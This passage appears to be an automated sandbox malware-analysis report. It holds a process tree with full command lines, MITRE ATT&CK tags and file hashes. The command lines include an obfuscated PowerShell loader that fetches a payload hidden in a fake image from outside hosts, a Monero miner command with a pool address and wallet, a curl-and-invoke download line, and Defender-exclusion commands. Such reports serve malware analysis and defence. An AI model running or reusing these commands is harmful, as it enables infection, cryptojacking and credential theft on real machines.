C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"9⤵
- Command and Scripting Interpreter: PowerShell
PID:9148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"10⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
PID:9544 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"11⤵
- System Location Discovery: System Language Discovery
PID:12624
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"9⤵PID:12856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10301700101\659c4db84b.exe"C:\Users\Admin\AppData\Local\Temp\10301700101\659c4db84b.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:11764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:12132
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
PID:12144
-
-
-
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe --algo rx/0 -o 104.245.241.161:49301 -u 49GhWH3rjFtLzNT3yUhfEpYXQHgLTmtauRZJT6wXP37CJXYVkai8Ya1NQdoHtjHAPH59YDnKBLrVRRRjYXw71NRn6Sn97NJ.Worker_CPU -p x --cpu-max-threads-hint=50 -k2⤵
- Suspicious use of FindShellTrayWindow
PID:9780
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3516
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4028
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2172
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAEQALQBNAHAAcABSAGUAZgBFAHIARQBuAGMAZQAgAC0AZQBYAEMATAB1AFMAaQBPAE4AUABhAFQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQAXABBAHQAdAByAGkAYgB1AHQAZQBzAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAEUAOwAgAEEAZABEAC0AbQBwAFAAUgBlAEYAZQByAEUAbgBDAEUAIAAtAGUAeABDAEwAdQBTAEkATwBOAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZABcAEEAdAB0AHIAaQBiAHUAdABlAHMALgBlAHgAZQAgAC0AZgBPAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exeC:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:8672 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:9036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 9420 -ip 94201⤵PID:5516
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:12796
-
C:\Windows\system32\conhost.execonhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)1⤵
- Process spawned unexpected child process
PID:3540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAEQALQBtAFAAUAByAGUARgBlAHIARQBuAGMAZQAgAC0ARQBYAEMATAB1AFMASQBvAG4AcAByAE8AYwBlAFMAcwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYATwBSAGMARQA=1⤵
- Command and Scripting Interpreter: PowerShell
PID:8980
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Authentication Process
1Modify Registry
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD5f5dcc8fcedacc29e0e58614d410a17df
SHA1b4b107e17be7a8a75d1585d2dc3d488bb665075b
SHA25667b2852bca887b7c89af6acc66edf4c637c4b0a42822e408165bcb0e0bb63c3c
SHA5125fc99b53516ac98bbadf540485025632e89a1bfe101c1fd8a1a6bb3c19246bc4f0f8f3516df15afeda376098f406eedd97da3a3bd49ff28f8382c429835e19d4
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD52acd955b5553fb9563d7c2906155091c
SHA169a013e7c76663155ff4ef512e04de75e9bcaea4
SHA2569df4d45ea537ecedd1ea42a662fe39d3343f7ac900993ffe098f4b0373694b1b
SHA5120a0329258902a6410a51ed83790294b62a0ec969a9147e1e0e73ce71d7b3171fe668057cff1c900e3dc2b9ff3579f7d208d010a9cdb4436cbba029e04ceb31c1
-
Filesize
280B
MD5690f9d619434781cadb75580a074a84d
SHA19c952a5597941ab800cae7262842ab6ac0b82ab1
SHA256fc2e4954dbe6b72d5b09e1dc6360ea699437a2551355c2950da0b3d3a4779fc1
SHA512d6b1da8e7febf926e8b6c316164efbbac22c7c3d9e4933a19fffba3d1667e1993cdeb5064aa53816c0c53f9d2c53e204772de987eb18adbb094a0fb84ae61fa9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\43777905-94d9-469f-bdca-c5a9e2858271\index-dir\the-real-index
Filesize1KB
MD5b5c4629e33868448e5328e949e01d6bf
SHA1d0addd774c45f4ae70608380de68789eff022c62
SHA2561ea3e41426e71780633bd1557c640ac388317e7b7b24a8fc4c2e302166f75730
SHA512865115835b6bde2a0c49d5606c2e9badaf47feec8f901d4b4f6cad37fea71c54946374174e3356b3af5470352d9726b4e297a8ec599d7688cb070feb8ef63ebf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\43777905-94d9-469f-bdca-c5a9e2858271\index-dir\the-real-index~RFe57bd64.TMP
Filesize1KB
MD59bc9b61101fd62bfbc91d46345e0536e
SHA15d2ac521af2a4a5416a0d3eb614834f2cf3ad5f4
SHA256f668ff9286fb8a8a60cb706bb431e54e7b69148f900ed8d3643600c403083470
SHA5121d0ad9b6fd68acf6c56626ea3eaabcd5ee6d700c7ca2b3f7a922bee843a95a26eb3fd01d0895c4f5bc45f0d53dc6c5789c280548ac5046ad26978fb2c8a4e922
-
Filesize
40KB
MD5ed43715cc10877fe55ee113aba17187f
SHA105f9d782e4345dc791934bcad4efc32ba81b0491
SHA256f04237211665743c4fd8444e7a0815d4c22e148891f8ccfd202bc43c60143c5c
SHA51244cc1d73b1fa0cf1a587512d15314d0eb1a1b3976184649c9c16f543e90d51017a877d4d4c66caa8f88e5c0d05b3f3f236686ccac6a9c474b4f6df0f6b7af348
-
Filesize
2.0MB
MD563dfb36c0f5e23440ba4883aa4724e7c
SHA175c634d8c13392e377e0f5a6ebd13b55337e7b87
SHA256d716f4c5b3f4e213aa10ab222d307fec44a1cab34f512807176a07cc412bf319
SHA512fac6535f2e89c058f8564f7b09c3540f8afaf7f040e28391f3933fd58fd9ae7860a5e6d9b76dc1ee7dd0d5329aaf50d7ec06649d588d5496f3e137892fe61015
-
Filesize
1.7MB
MD50d1c178fd56032549a557e63af5a158a
SHA1374413f132e5f994eafb93d1e423709d1d6d40da
SHA256cd624698fa0bb2fbc3680cf82a7c46aef413367c6bb4b11f794d2070fa712e22
SHA512bc3273bd56d128cec9e159448dc18f44f1b904f5e7064b0de401164599630ff33ecb588819a7ca342ca18611a5f31f325eee2f4cea3f9a88d1145c821ce3a834
-
Filesize
4.9MB
MD5c909efcf6df1f5cab49d335588709324
SHA143ace2539e76dd0aebec2ce54d4b2caae6938cd9
SHA256d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6
SHA51268c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a
-
Filesize
1.1MB
MD5b38cd06513a826e8976bb39c3e855f64
SHA179eef674168786ff0762cfdb88a9457f8b518ed5
SHA2562e0b126dd788c027ca69b01335d4a08da28987c3c4296a3523d947da3c12cdc2
SHA5126944ba859359f162e1fc5b2c2b14c7ab1fb9cf5c0a83d7d81d3de722344e8ae3efc300fe369a87d550645de93de4f02ed92c47718cce6fe834fdaa6b543730c9
-
Filesize
11.5MB
MD5cc856b95bb94ebdeca5170a374122702
SHA12f1e0cfd433fc3d05ffd525ce4f756263e2772fc
SHA2562351b77ceb3664e9045e797d2eb8a00300f795ea2ec99a81bc05156b6d695085
SHA512006b849c4ad2fbd549bd00deaa42976a521c54ce254584b7696ac901c55a543548da069f3cfcc404f7827f73504d5d9f69315770de2ef0b8bd530f2e02bac37b
-
Filesize
677KB
MD5ff82cf635362a10afeca8beb04d22a5f
SHA189a88d6058bc52df34bab2fc3622ede8d0036840
SHA2569a527eb9bd0239a1619632d2ca9d8a60096ad77986a430b1bad2f9e87f126c4a
SHA51266e423011be69a12d5e74586311ea487215f1edf73199ac065abccf248e361e2c74ba18255c38d3724764a379ab84bdfee10e75665d848a9edfb1ef48373ffa8
-
Filesize
1.1MB
MD5292b5a2b7820688e131d541f18f48e84
SHA1edb93c76c7edb5ebda65281f98fcc8e65ef3dbe5
SHA25674c75de994a3d5033b78aa33774c8e85894869e12cd70376291dc0eb428fa7e8
SHA51212d03a3cf95a10ab1555abe27f669f7073952d5d6a7ecadf739e3df4bf0e0712e1ae01e18ea9438eeb7cf3240965f4d86baef56871e11dfcf23cb9076014cf6e
-
Filesize
1.3MB
MD55e9850567a55510d96b2c8844b536348
SHA1afcf6d89d3a59fa3a261b54396ee65135d3177f0
SHA2569f4190eb91c5241d0c41a77e1c12fe2dde01e67ef201b8032ada230333e2ae81
SHA5127d8a03e39567a05e5945ca9e3401d31c302a2ff0448da4cd9804f62982a9247728552264e51dc8ce2390706874b4050e4598bdb2df076ef4407d9d31376d5fd9
-
Filesize
1.4MB
MD506b18d1d3a9f8d167e22020aeb066873
SHA12fe47a3dbcbe589aa64cb19b6bbd4c209a47e5aa
SHA25634b129b82df5d38841dc9978746790673f32273b07922c74326e0752a592a579
SHA512e1f47a594337291cddff4b5febe979e5c3531bd81918590f25778c185d6862f8f7faa9f5e7a35f178edc1666d1846270293472de1fc0775abb8ae10e9bda8066
-
Filesize
3.2MB
MD59ec5cf784ec23ca09c2921668912cfeb
SHA14b9c8b0d197c359368164e5738b44a65fba40741
SHA25656bd8367607b32bfe275478f96bbd0fe213c07eee696e0a268f817ea757a9543
SHA512043d623ae8f3dbb43b504ba08d916f27f9054c4df46c6b5d0ae56e98c44b919e8d9a05e333c08adad286353bf5f6f1b75c1ee23f819462654c94e1542c31c464
-
Filesize
5.9MB
MD55cfc96efa07e34454e5a80a3c0202c98
SHA165804d32dc3694e8ec185051809a8342cf5d5d99
SHA256fb0fe7e716caf3e0dcb1fbb6824466f807aa85295bfc7ed7046febf3331dab88
